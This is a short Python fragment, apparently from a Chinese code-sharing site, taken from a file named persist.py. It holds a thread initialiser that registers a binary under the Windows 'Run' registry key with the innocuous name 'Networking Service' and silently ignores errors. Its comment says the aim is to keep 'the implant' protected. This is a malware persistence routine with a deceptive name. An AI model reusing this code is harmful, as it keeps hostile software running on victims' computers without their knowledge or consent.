def __init__(self):
threading.Thread.__init__(self)
try:
with _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", _winreg.KEY_SET_VALUE) as reg:
_winreg.SetValueEx(reg, "Networking Service", 0, _winreg.REG_BINARY, BinaryLocation)
reg.Close()
except:
pass
# Do things over and over to keep the implant protected
persist.py 文件源码
python
阅读 29
收藏 0
点赞 0
评论 0
评论列表
文章目录